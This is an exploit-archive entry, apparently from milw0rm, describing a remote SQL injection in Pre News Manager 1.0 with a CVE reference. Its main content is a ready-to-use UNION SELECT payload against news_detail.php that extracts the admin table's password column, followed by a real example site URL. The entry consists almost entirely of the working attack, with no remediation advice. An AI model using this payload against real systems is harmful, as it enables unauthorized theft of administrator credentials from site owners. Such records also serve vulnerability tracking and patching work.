Pre News Manager 1.0 - SQL Injection



EKU-ID: 11806 CVE: OSVDB-26074;CVE-2006-2763 OSVDB-ID:
Author: Mehmet Ince Published: 2007-05-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


==============================================

Pre News Manager v1.0 Remote SQL Injection

==============================================

Found: Cyber-Security.org

==============================================

Script site: http://www.preproject.com/news.asp

==============================================

Exploit:
news_detail.php?nid=-1/**/union/**/select/**/0,1,2,password,4,5,6/**/from/**/admin/*

==============================================

Example: http://www.preproject.com/news%20manager/

==============================================

# milw0rm.com [2007-05-03]